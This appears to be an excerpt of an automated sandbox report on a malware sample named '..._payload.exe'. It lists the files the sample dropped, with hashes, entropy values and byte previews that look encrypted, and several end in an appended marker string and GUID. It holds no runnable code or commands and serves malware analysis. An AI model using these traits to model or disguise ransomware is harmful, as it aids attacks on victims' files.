                                                                                                Preview:<?xml.&.._..<...;.S;pT..........n..3]...3....\x.p...A".N..!$....9.5............0.....!...............j....U.A:t~.3..3.....*nE..d.o.*..-.:7..j...W.......a4..Qa.)..>.........u..VaR...N<..-v`G....\...]f[..g2O..O.3......[[6%{S.y2....I.A....."...4.......j..1..7.R...j.w.;..e.j....`;w..j..^Q....u...C.&.7U..M..O.5.M.O.5...;.!J...V.8.......l..........&.k......x$...Rv4R...Z.Ls.#..Bh..Q..L.2).jE$O.....DN.*..if....@.o.n..G...].._.tU...`f..?.&y9..P0......GmiO...I.v|.....E...Y...+p...I./Z.....^]`...>..BG.B.F..sJm.~.QU.mm.Rfvw].C,S..V..........+.....#.....3....o.3...R.........9t......O.....o.M..2..".P..<.Z.:5V..9........R....".,.5...Tu.+.<f&.qe.I.....V.D.i..Gn.|Z.@.9jW.2..@p.d.R..P.l.<T.0.Q.*g.kK....f.(+.....LU.....QCO.V.0w}9w/(S.(.......-W..4. .N......)..M|aUy+fa...9..-V;./8~~...h..y...7....._../.xA`...i.-....[m...J..q.A.n6...~.......w..E..7jxz.....|/"..d.........[b.QB.C..k..g.`....E....y.#..$...,.+..k....P%M1....:....q....u.9.Nb...;..$.....|..z.|.h..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7356
                                                                                                Entropy (8bit):7.977490609966316
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:V4ZtUoXU3vJSyaIPBaFFpwJ3wXjd/GcJZ3RMEGoz4:CZtU33vXYp/fJZ3uEGoU
                                                                                                MD5:4F4DF3B8D0FC71A90A08BA8D4774B430
                                                                                                SHA1:E55361AB6320516FDAAA3EE0386AAEB9E034686D
                                                                                                SHA-256:28A9FA55182C93069BB2156EF0FBF314B8CC6B7A367D483ED788543F2180CA34
                                                                                                SHA-512:C3C894C6595FBBC579C116B3FEFC59BC4E9E5E04574D61138B074A180B41F48A78262E93219B72532226B1B199E97535D59BFCC86B33C7E299532337BC83CBE2
                                                                                                Malicious:false
                                                                                                Preview:<?xml..'.}Q:.Ci.....>J...L.u..E..n_.....Z...Q...<..3.f..p....^......s..\..G.7..L...g..%...F+3V-..dyX]....$W..~...5..j.'..R.G.]%..=... .A;._E4......5.O...R...0S....s.....KE`2/..s....dC....K.g!).T]/4.O@.....J.u......f".*..`d.L........=X......-.-../...(..z2.s..(f.].f3~.r.b.....a..MW+.q+J`...S....K.,.......Z...Q.e4t....@.i...$....Kc...;.2.8..4!.....Y.&.....gF*j.=".X...PYq..%..$....f...........J.S.}.$U..[..Z....mnH.u.6B..B.[(.......fc.w'.....uxZ..HV........as...;PlJ.9..$.....:.K.,....M|1s..Tiw..D....Q.7...A}.zG.R@.O:..\.y7.I.]L..p...R._.'...[ElQc-..m.@Kc.\d.L~..+x/.)..$.k..7?..@.~'.....[...^...\..].......|.....]...U.......z.pA....8.@...f....F..........z.GS....X.......5..dh.....P.a.....)..f..../t.>...}...4+ h^tZQj.b..y.?..C.}..@4.*.K....I.@....gW.....s...m.C5.........)..[Y+7*....iL...IM..<.+V...yJ9}..f....!I*Q.0W\P..:..........^V.....X.....z.<.....-...M.Q8y7uQz.v.wW.3..3K.Y?VN....wf.P.......X.}...^j......e....xb{.i......._b?..P........0.OIDD*.l/?Qa.u
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1551
                                                                                                Entropy (8bit):7.870396132652019
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:FITaVU/7+dC6YsKmkBTXGJDU/OiEV7l72xIMgLD:wwIhBKQEvyGM0
                                                                                                MD5:E0ABCBC87FD543D39F0F4AA660574293
                                                                                                SHA1:545FF80C9EAE6B989E30C576E902F5CB4C12D633
                                                                                                SHA-256:BB7190C0810AD634B70F8AEC21E2C0F936DDD8B53F9AB84B81F7661BD9CEE649
                                                                                                SHA-512:2D3ED6A6D947DB11EC65DAE79E283AECE8A0290CD88802F184336DEC14478714A7A921813B41FC19F5D9B771451207F39E8674B8E9D8B32C512A75A6F77693DC
                                                                                                Malicious:false
                                                                                                Preview:<?xml.r....|.K.......".1.}h;..._.R.6.@.c$..bV..za.Sv......,..OV.J[..G..w.....`....p.,.......l..D=..'...J.h.......L..kCQI.Q_K..[........z.!,..2...U9...,_O`>.j.}\...j\.i.LT..(..) .L.ByIz..:.&...2\.Tm.6P.}.M........oPT+cvM......oi.I.J"/,f.u.YZ.]E.C.kD..j..v..#q6#'>*{.......Nd!2~..OF.DU.4.x.I...S..OOi...b...).....!>Q.si..8f:.....Kp...@...........D....l.m..\..q.*.......Q..y...6...M...-8...K..n7.;.W.n....K....E.X...d"...^ ..jbZ........._.....%.....,+L.2..=0..1....e_..c.......\....<.....c...m.~A........i8q..^yFm..5....B._......NB..5.Ii [..,.Z..d:.\...."k..O.cI.zx.".I...(.m...[...h@7..f...".7e.P.~U.......f.;]$.:a........nq.0... .n{0m0u.(R..s..6-o.C.t..+61.Ubf.H..~..E...F@..R...x.N.....q`..U......F.d.8.B.e..)H.2....s...^':...W.......[.%.W.H..q.#..m........#nr..,..WFQ........E..pSZ..X}..*..6.Z...k...O.:...Y...#fG.{./.[{.?W..1-...\..G.o..3.......r.x...!.{.U.=t.0..4.]}?*2i4AG.T.>..DI..a........g.....]...1..y.inR.3b.".7..+U....#9.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1716
                                                                                                Entropy (8bit):7.86030971078205
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:fMT4miBwkQT8YB1V+nyjxoR3LBdzdcIab9VJEFx2Q2LD:S4mgwnBLxirzeI8Qe
                                                                                                MD5:34EC3C4DCDA7779068FD267E56C46241
                                                                                                SHA1:171DC3709ADBAC030441BF09CC13E2EE0C7FA9D8
                                                                                                SHA-256:BC7DD04907CDAF29FD593994C9FE188DC8FF8D0214328618BA34E78993F234F9
                                                                                                SHA-512:B11841F9A66CA7F0D1CE7AE134AF1F5202B2E006BD5EFBEF87C699DA8771ACC652A8BA4AB672A50FD499F365E0EF7D488F15D035FE451FD0791B695B9508B0B6
                                                                                                Malicious:false
                                                                                                Preview:<?xml....8$}...7>.....[.U)1.......m}. j.dPr8.......c..Zb..{.[..Fy.....b..D.a-.9.z..L..<M.O.z./.z|X...0.......5O..>G`mb...C.9...G...GW.d.....%..hN.......b.,..R....$<.L..s%...^<.A?.sq}...NZ..>...I@.\zV..H.....b.y.q.hN.tJ...J....*n:.....}....0+`..z...Q.;A.".(.c...H..}r...^.r..8:h.[.._..4...@.........6b'........~.......FA..>.T...!..:,f.lH.V....F..#..."..9....j.v-q...H2{...w...i'.\..t.9...|]c.ZR....h......7.D;.D. k.......&........hM.............~hD......i..-y5.L.&..i.U&~h4_k......%..?t..8.......2Y0.{.z.;.].:...j.v&."Q...].~...HS.....}.....@.....tx.)i.+.......@A.d@j.J.jH...F.p......3.....RB0..I@.J.:..6.4.*.,.E.R..s...Y....A...l...QU....8.2.Zf..D...A...'4#...402.S.2.....F.-..x.s....$ry.!u>...\~....e3........O..\q.cK..t`..~.R.z.{.#/.....}.......P>.k.4.&..o`..[....d..Z_..:S$........u..Kh...f.....D.....7:C..U5 .X..*(....{..6.IA?.[r...E.O0...T..9....V@..|.}...Ux{n...!..o..q.(.,$0..v.f<....?ei(D{....,"3..+y..Sb...\......|..b.*..Z.f.tu.!v\....Yo.*.3#
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1737
                                                                                                Entropy (8bit):7.889459579067924
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:4Xa0hYbfYDbdpYoMwde/I8Xe30BzvOmylmej6KuYu7smLD:4Xsb+ooMnVvjykej6K2X
                                                                                                MD5:1741FD4F7CE4389B15F15A1E3D9B5499
                                                                                                SHA1:F348EA4598B7BEEA3D16CC0B0730E8B54417F2E1
                                                                                                SHA-256:73C95F32083F913FB7F3374B90A12608ED1915814FEF0D920A4BD820A72F9B6E
                                                                                                SHA-512:6CC52DF5FADBEAA9E9EBF82137B3F8C245289DB71F28A8F9EAEC5477A2D02C9F21D59AD7939637978975DC06B6ACEF0D25338AA0895712A484869E696C0F057F
                                                                                                Malicious:false
                                                                                                Preview:<?xml.c.I.z+Z..m....ltx......i.#.2.b7h......=....n..y...2..UH{L..}....+}....+R....^kUo...L.5....U..'B....2..T......S\..2h..!.t.i..._=S....9;{.Lx. .,..tCc..mSo|.I./.Dj....RY.....d)....^)..Hp..x....&..0xl..O.o.F..`.s.W.d.c.....x...........N.|.Mq...QT.....~.....Yom...1..()v}.&..W....%...}.....kpB..:z).hjl....n..}W}.m......*.....l..].,...P.....;.uaV....Y....*+.r..@.i...##..C..-..v{.;.i..)G.H_c....0.*. Q....c.......&._.q..........3..\...5....4....@.p.3.U. .....*.:..1.w.O.r./Nq./.$E.-.!...h.w1`....[..SXb..6W....Q..e...w....5m.R.U`.$>G..c.M.g.P...D*..ej..:i..;.G.O...+}"..:..R.%..J..Th2..@._~../...*-...YA.P...".9.{.4yhX..........U.,..0...*.g..7.vqXmZ5..T@....kU.!'6R.w7+..w'.M..X.3.,......._.o,s............=G.`".p...p...~I3..Ts.....K\.F.E.6.......u....K:.B..v|A....y.....'.....i......t..NT..u..#...u`...{...].......7..+.0.yq..9.EB?..H......N..j.`{WB... .7....*Z./...W..S..ZL.i...N.....c7.|J.q^^.,+ 9l........+T...3....J+,.../.....G_.R9u....e.ZS
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1448
                                                                                                Entropy (8bit):7.846144503005971
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cjEHSJPS7tf4H08If+9Ciat5/kSaCZtiUFK7WSiULH3IbPmruyfN90cOT265x3bD:0a7tQU8Ifm9M+Sa8wvWOLH3IbPRaN90F
                                                                                                MD5:B71764F4536B4C124D312C9CD98F0C8A
                                                                                                SHA1:BA9A24A9CF4F1ED3AADD0C65C057DF9672C79342
                                                                                                SHA-256:80EEF6411301A027060B2611DD0BB50FF8E4A6D5C9537B0E4B5C3982F3C2540B
                                                                                                SHA-512:31EABB46F1F09D9C016FEB43F32217DCC0F02DFFDFA11E63B7C4B9AD7347A212FA9094C3E310722FA2D3A46E1C511E75EBB9B6560BCC755CDE4BDBEED07B2143
                                                                                                Malicious:false
                                                                                                Preview:<?xml2.kA.<.b......LT..W..*.%..$......S.Z...f...........A...K. .m#J.7py-.n.O%..B....{.5..H..z..f.a..j..,..5...a.f...P.@,K. ...X.G.......~".- ..,..R]..%,.G>*...$7*...._....5.[..8,$..I.003w.V.b..?.y3.]..J!...W...]......u.?.4h.....0q..-8+[..?OM...........d#....B?7..C..kL/...S..;..`.f.......[x\K..g.Ok1.K.R.V...:ThE.5Ec...9._j.he....d.*.1~....Yg.=.4.y...8......',.C....QO *).V.r.k.4B..@.2H..r..I.. ..d...Q...}...6.....S{nM.pY|@.`.,$..".J}.,V.#s......o.0+..:.w.M...%B....A.?..P..G.&....Jn!.sw.9.......$.d.....z.;eb..<L.._/.Q.g.?. .Yd<..=.,m3....,&..Y..R.;..9. .......;.+.....+..*.i........k....a.z.....&1]RV..,. ....l..L.....a...q...x.}..a.P.....ZT......6i'%\T.^.E.M&....&q..f...5..u..Cq.....6..XXL{tP..E.u.E....b....b...;.>Gv;K....".....).z...j>....Du..P .}.....(.uU..;....*.O...'.$.5.xg.Z`.........@u....Q.+T...%~O4....Ty....XK%../..v.....O.P..(..GE..T.n8..$bc...4.,.p...V..2_p..e..B..H\./.)...DiA.@xC.........M..^..[....U......}..^..a.a..E>.P
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1419
                                                                                                Entropy (8bit):7.861904667438062
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8OyUZmfcD6AaJBR/J4vrMApp19UrXUSxp9HQg/QVYEcfzzLo+D6BYl/cx3bD:8Oh7OAaJT9a1On59/+szPo8FILD
                                                                                                MD5:D2EF5A09B04C28B6E01776771225045D
                                                                                                SHA1:905D127E3E6B542655EC35914B0E95E14F9D92F1
                                                                                                SHA-256:947755396BC5141E1EAC54AD19CF3F088E99DEE64FB3A655673D302332B3363B
                                                                                                SHA-512:836FE8769B9E27BA0E3F517408A2079E2841C803DAEB48A0D9BF4B41ABD83D6EA5B51789569F8D8EA0343DA7C48BEEF3B0781AD2B876B22B653D51EBB6CD5DFD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.$..a...2...._.xj.3..U..`...Z..aM.J-........N:o.-....Y.7...`.;........'....6.f...[H+!.~.l...lsX... .OM.,.....P..n..s.$M]A..vZ....9v/..w..8............Y5...p....BZ|.N.Z.^..3.`...."..F.&..4.....O...%....q../........DOB..C.$).w...k...jj.HI41.~:...].9M.=.cF...Xl:..5..l.".&J...$....7.1..R'...N.;.3l,.g........olo..i...5zb....W..\iF.,V.wo]N...1..&b|g....|...N.G..aNd....?..-O...\2.Qh#].O~.FU.f.W.....V..5./.Q......A...m.x...d`.t,2,h..4Tk.s...o....._u.\...Di*.#".Wdb/Q......Y@Sw.....D..$Q"...F..Y.../(..b<.w........t.gC....#...]...*%KG.>]..5....o.L...pJk|m...b'N....p..g..#.n.".oB...u.,..bE.3...e.>.....\....|!.B......l.F..rz......)..c....M.Bw7...W.1j}.L..o@..)".@H.....Fv..Y........Yr......+.tUUwN<C.1..g..qCPh.#".?.[.+.j.....#x.w.=w).m.......0..T.....d...Ts.".{@.}........jp./t.4.04.3....>.L/ruW/`-|..1.p.n.w.I....u^\..D.IM.f.;z.}.....i.\M.s......pT+:...*>..N%.J.D4...I...B.zH..].lkI7bw&.D.#*.N.PY......t....5....-f"....l_QN.h....]...a.......h.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1546
                                                                                                Entropy (8bit):7.871812293168137
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:KFwVT/F8g0j86En1Jp1N3mqNJgchs6wLD:5VjF8g0jA51Vm8gchs6k
                                                                                                MD5:6BBB59B3E2608000849562D335A30866
                                                                                                SHA1:446345AAB96FE7874759A4056A23E548E6DF9441
                                                                                                SHA-256:28263A8F24E5F4F2993AB785647078724E466FDBE02C5BAF486B16D8E14CEE49
                                                                                                SHA-512:862F3ECD3B8CDBC60E8E016993767A7596CE6BA94466DA264DF712AA47AB105FD94665ED838B7CCEAC49A3EB96003876F521CE2112FD30A43742758C20914C69
                                                                                                Malicious:false
                                                                                                Preview:<?xml..ml..._.../.(_[f.jf..~.v....="....qW...]...u?`.*.,.AtQO.H......".........#.Ef..o..,c^....8....;.../........=B.. ..j.y.....K.....j..=<.r"...[b0..A.|k.`..8.u..s.-jH<<..\..R.yzI..o......x."k.4U.Z.4..g...........J...3.qTI.d..d..CC.&|....OVJ.b.G...7..m<..?.m..~...i..P..B.......a...t(.^.X...#Q..L.....TU..],..iH..~B.......=5.%$...F....J....~(NyI...,...........B.8.9=@....).{v...?=..t..`lJ.U.?.j..6^[.$...).|.Q..O...[..\....E....u#.")ns._.....T.X.Y.w%k. .h'Z..<e#4.b..Nz..^.kJ.Y7F....@q...:.".9K.`.....Ga..,&2.....u.`....<[Y.. %....p.=.8...$..[.=MS.d......7.!...........!x................4.....ju.\.iux.i..8[..z..=W..WN...'.u._m.y.z@.V.~.V....G.A-.A.!B\.....>..B..E..f.JJ..z.v.#..9Bi...........&.*|&R.UR.&.-....e=.~.({../.P.[...O.*....+.iK.).2k.F..E..?..K..'..Z.%...vs.w...I...8.\e.....o0.4Qh.6.mr.^.x..l....[.Z*v.IQ...#.J...\.R.:../...{......yK...y.....%....s....A.<...l....w....5.... .H...g.Vg.BjB....1..(.~E!.p....g8.n..>W..6...0.........[.[..A....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):903
                                                                                                Entropy (8bit):7.750936426253263
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:7bch+S56Ff2nqcVUzmNKRwk1vY5vxlKbWxvf55LVuee1WCG9ZglGVSMcQjV/aXul:vchvU9Qq23PFrfes6GV5Vvx3bD
                                                                                                MD5:92F7F63F96DEDDA8F387863A032B9913
                                                                                                SHA1:6CEC2DAB72E53AD52EC6E32EA567AA81C00DCE71
                                                                                                SHA-256:9AE5CC02C1A803A743DD9B7844316D411A90D35FD9FA53FD67A064E9DCF8CF82
                                                                                                SHA-512:51217BF0A7FB6626D9E2C8E029ED329176EA2F10B1162ACBE5A441A33F591B5871AA4B0B7F34873B098C2742E36E01738000719D721FAA9BA5D7FE02BDBB9C65
                                                                                                Malicious:false
                                                                                                Preview:<?xmlc..!...Z87.Fz...ts...u"WD~.!.6-..o.9u.o...g..Q.....6eU..'."....*.....:.49[..5.p..j.....n.3E@...Q..#E.DG.-n|..}...M..'3.....u.h..|.........Lp....X..T...C\..U.H..`R..b..j4...B..37..Y........B`.r...S...7.yK6T..q....U.J..B.:|.2.w...z^. ....#..:a.6...H.>..j...2.UWp.V..I.i....o=vZ.6.(8....u....)%g.;....2!...4rV.q...r....Z)....GA..4.......T..9.To..;."j.x.....R..]#...O*A.A.$.u....2...k^....../..."Z...||:^L..lJ.t.$f../...P.< .q..m.-.....y].t....U{b?..1....u...v.....)...m.?.(rJ.h...9..G.QQl......^...b....%.Gm3&...<*.4.?..{-.0U..[<@3\w..4.0...$.)..."Z........?Zy5.?.....g.-..G.....#|.+...a..X..A..o...y...H.+......z6.P..x..E8.....^-...b.h......].4j...w%....H.g.ON}...3?..(P;..@i6L....f....8.r..}..u6N....j=..*..T..~Z....YJ.-...}5.Y...hn..$.fU..S.,+IF$..h.3.#..V.c...ueh...\.'BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3566
                                                                                                Entropy (8bit):7.947278653701961
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:bUjGspKHyJdmb6sZ8UliHcMcA9Pb8AGzs:bUj7yK9E8UM8MW7zs
                                                                                                MD5:A1A829C421040B0734F51C77FA30EF6B
                                                                                                SHA1:5908B81386FBFADBAC99BB1957FE6E3E7C41EF2D
                                                                                                SHA-256:3C3069C86F05030FE79EA7B011BD8EF3B37E4C11D7F7E82F8CCC1B2A619CAA20
                                                                                                SHA-512:AFEE8148E991E88515D59EF390277F5C2031848A826EADFEC42D42C7C64E9166A5361162CB1B054980107AF04AD85595E91E666525772FFF0645697FBADB0D20
                                                                                                Malicious:false
                                                                                                Preview:<?xmln.WB@&gwz.bO...a:{Ie6.W.....k+.#..F..MP.t......r..k.;8.l....G_f..^..&...V...6..61...Q.!.."...''~......g...i...A.NbP..;....MF.G..........y.D.....2..T.{.v.....=.....U....I................S.d..o\..IR.q..F'...R...i<..0..A.=...BX.H.........%E.A.>.Wn...~q+G.638.....J..b...=g..j+....V.p.S..ka.m!....c.Eo..nd.......m..2.Z.TD.(....nM.wW..6.(.q.^..Y..x........._!.l..n..\...G..U...a....!./...tc(...[...a.:,<....v.......b..^Iz....:.2...f.t..)$&..D.....8P/.........jk_..#...Uv>A.Q...l]...U..*.VY7.O.x......[...T..~.<...#......)}.:..Y/\iu.R........,Or.T!h...........KXRP.w...x.cC.$w.....)..;.h.hD...i2[.......:T7e'(...D.....T.v.....rg...^?....'ZX\CJ+#9.z.*.9:..9.y.,m2.9..sG._D..<k.ZgA.-.`....I..k..wZ...e...^.!..U..a.hO.0....<..............<z..}.&.XB.2......Ez=.%}..Q.RY.q....f.....l....="Zc[..".B.c. .Y..s.=....s..K..K.l.....JJ`D0..K.$b.....M.I.........^.|...,.fDH.#..ZQtx.py..4.r...M......a......;.C.i..D...Y.....qD&..Y.9..Vf.......-....zi2m.W.+..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3677
                                                                                                Entropy (8bit):7.951675128036883
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:9OTTEUiU+hMopbO93dPm+vqXBoedI7mDWv7uhh6DFKO:8pMMoVOebdaTUO
                                                                                                MD5:AE174BC1685BE2A7AAE651905906BE3D
                                                                                                SHA1:FC23F673C73BC5F627AB3C073A0672164FB23E0E
                                                                                                SHA-256:1E8CE1788B9FC4F49364F827EF7AFD0FCB7FA56E07BB667D6AF6F01C38AF1D40
                                                                                                SHA-512:D704639081F4CB5482CDB1267A091A35D60C390413194DEA28531B49CF483CF170EC7641ECB2A29B87B30702A1A6B82ECB8A9CE37286A6E17DACEF3C1712F942
                                                                                                Malicious:false
                                                                                                Preview:<?xml^.g..u.eZspT..Aa....D..M/+jLF*.-.Y3.........+.9=........Y....y..z/..C..(T..A.f&.Z(#...6..k.E`Z.ai..o.FH/.....P.....R..{.W..$E*Z.)...Gi.F..._..kLb-MI..(.......\7...`=.......T....'.."../..n.P.~.Mn.n...&AF|.6.$..+.._..jFK.`.).j\J?.j#bs.9...a~?...5D.z.Q...._..me.!4.>...zG.....?..!?.B.....;..'...*.RH.|...C.^.....|t...&s.NC../.,.|..o...6*.......}`..Z.F.<...n[.(..a..L.0R.o..)./......0jtc..EYT.S8..[.Q...B.5@.v..p.#.O.c...]%+$k...@...Sy.2....bq./..+.6......-.t..*f+bji..f...f.OiD.*c........G..*.v`{d..[X....1.?.wP...{i..~@...0s...}v..K|..go'.]../...v....5,oh.N..{.$...[..K...fF.DT.z.Et#nc....P..R.7o.1.C....P..t..9s............Lu.14F...U.+....!.$W4.\}?!...Hk..Y....>.v.+........;.q... .........Z......~...v.m <*......R..C4J.........8.?_.B...d.[..~.}.]..h...$7...6L.7.r....<.R.....)...GU.,.z.^...$.t.ww...H\"...Br..=........-..<x9.".!.XY?h"h..K~B.GZ...1D.......W.....T.fQ./Q....j.....ej.8X2.a.u......`;..:..P..'..C...y....K........].-Gr....f^...;..s.C..l.Dk>f2
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):744
                                                                                                Entropy (8bit):7.697945280665077
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Rzo3XvSYqtZbV2757jRgzQv4qNpkzaqG7S8Otxgs+FSeUb/3rlxfnTAq1HTIM6Sl:ES3tUoz9qNazlG7XG+fFSeW/7L1Dx3bD
                                                                                                MD5:D30B8FC834C1690C4C20DCB904167BD0
                                                                                                SHA1:E55322DC498CA8226C3B9509F23ED9D867CD67BF
                                                                                                SHA-256:3E705B72E4F0C752CC34E0C3A7786A25739B9C53241F47F707C4AD04F0526C75
                                                                                                SHA-512:63A78FA1B8E65D5BE6E136B80E04AB077430CC4ABC99BD8914811C19AE9FB7E27CA4899C94ADA790FDFE0E30435A3A4A3E3612EADE699E4FDEB57FACFB275998
                                                                                                Malicious:false
                                                                                                Preview:<?xml.......$.<...Wt) F.d.J.0*.M..vKz.w..z....2E=.*...^+a@&oo-...@....gK7.......I.@...3../..?.!.P.F.....V....@.|.....h.a.r.ojV.K.(&. .Ro.X~....g..........y.....2.e..$.8.b.gv&^!..d!l.s%.......SJ@i......._=P1m..W....t.[.VNQ.\k2/*~m.fH$...1..o...7....;w..,i...`ZM..n..e.0.T...3...G-....[*..X.z...=.........\..}&..m$.K...lX?..En.M.d."KY.G.6.a....5g...$.95.......`........N3......A'....V.] ..p...8<..Z....U[x...M .a.U.Z~..5...doXf..b.H.@.....{S.s)c#.(....%...m.E..|.8..d........I:.{.]..........V......^S.Z./.]....j......1.%.-.,t.A......I.../M...d.......7.1....?*....<.n..-/.....g....c-.r15.6;f...V.9.J.3....1&.........Y...(...d6...;.48.....W|Dj...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1620
                                                                                                Entropy (8bit):7.869284218516437
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:S9SyK8ns4aSodkjRnQwEes0+rsu9iGBLPcxznQMLD:wSyRns4todkdwzVrxJ9aQI
                                                                                                MD5:9B5559AC316F612AA652A2362939D044
                                                                                                SHA1:DEB995F41BB43BD693936A12D6B05B57A7125A0F
                                                                                                SHA-256:F51E6C383E68FCFF898D250D45B1FAC8758E07694752C82357890C4044692DFD
                                                                                                SHA-512:7B7A810C6B584F003A8F7B738FCE3F086962F59A3D045F0F83C83A2766FC9C52E54178085F2C6D22A1CA404024DA0F43E8181CFEE804EAB76941994CE6C00371
                                                                                                Malicious:false
                                                                                                Preview:<?xml.qoU.5H.j...K...hk4..I..6t%b..b.O.t...Q..H...H...,.8.$2..x.J....u........a.. ..1.X...'.......7.8....#..r.qh..i).;...U~a..b..<..W.....z5.k..-K"......_...r.>..@..C/.f@...THrS......qXg..`........?D.......(-zI.z.!..o......#..Sz......<...qP...o?.y..\.....e.D.$Y..R..x..t.....'..y.7......N.f.Rr../..xK.o/0v.d.....f.P...1tla.e....z...1..\$S.\...*.=...=..>.q#H...&".d.<...4.7Y.w.~.[.....j.......-...69..f.^.........z.( ...../....%...q.J.bz.|3w.u>...X.l...lY.....\.A.2.\R0..G.z..\"...../.Wu<....0I...P...".....cc.....+-.@_.....Q..4X.)8.-..cH]1.?.....:.U.O.U:..6"..u.j......k.3.......T......y.w1..<*v.~.t.....{..........|.......o.......VY.G...dk..I.y.....D.L..K@.jE.<.$;H4..;op.L.{.a=8D.....TCRW.9.z;5...*...$.4w.z;..#X.H....Bb.<J.t...$.$H..._..c<..... I...m]h.S.2YJ.6.7y4....C..)..k.....!....zc;@]P.a.{.0i.>V.1^.....3..2.(]..@x..g..x..<b...H.......Hd.*)...?y`N.x.|.n-.<..w.K....cB...".=v....1.m.....<..SCB..z@.~...B.N&...2^3....u...}Lc9.fIa.V.Y... Y....V.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):821
                                                                                                Entropy (8bit):7.737031761002574
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:ka95QUnUXz4hfAa8fAiCr5N//Ob7bKhU+ML+apXzECnFoi+jh+DogJc3cii9a:kc5QUUD44iPkdYaxzgfCox3bD
                                                                                                MD5:5268D7D4A1720D9D1572A7104844AC3F
                                                                                                SHA1:3D6F5EDD00B63C152BCD5684328D22EA6B4DD1C6
                                                                                                SHA-256:168FB629F826EB147B052A53C1B999EDD82D73CE946702A713A5B978131DF0B9
                                                                                                SHA-512:31225F9C0AE56C3CE3CDAB05004078C876C91B69ED2B6894DDF6F7537C63DACA42C7321C573F13475937DEB4DDDD4BDA6E6CC751CEE75B5533F3A5AC7D5D80AD
                                                                                                Malicious:false
                                                                                                Preview:<?xml...N..c.Q..p.w...+..D+"x./%...-f.E.u.@..J.Tp..W.9.L.'..x..4.n...<...R(%...@m.J{..a.*.^.c.Th.)a..`"...u....bHI...4.w.Q...;FF.g... .V,s.%..N.3.CY.y..p......h.....*...6.f'..j.[.E...........6..%..i..p.C....u..*..].r....+X..L+....^..VaX.....7.xp.`g...Xt.....>.....'&...P]^...)n.'..........V,.HZ,...]_..".y+..N.....{.B7.M...22.e..P`.W..'>.....8....N3oqi....K..qX ...4..h....e..S....C.lb. ..p"..]G..-.3.g..F.Z....Peu...\.aZN.....,I_.tS.dE.9.m..T..ia...zIM1%....s.%.P.Xw...g~.Pci'..&. .6.H....s*N..0...`.#O..tt.......Y.=.....k.O...c..kY.w..-.E_.d.6.....q.Qfv]&t.....0.EAt..4.:I.Ad!.(.....h....e.W...26y...L...2[....$..[.al>....~.q..O-.....H.....!_c....~o..Q/-....o](6C....R......+........|.....FO.T7U...+.[/aBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1034
                                                                                                Entropy (8bit):7.798632904317471
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:dEiJA3OeNpTMkXWa74+wJwVm9xrTNH/bK0rCv6wx3bD:qiJA39TMkXWaWeOxdDKSCv68LD
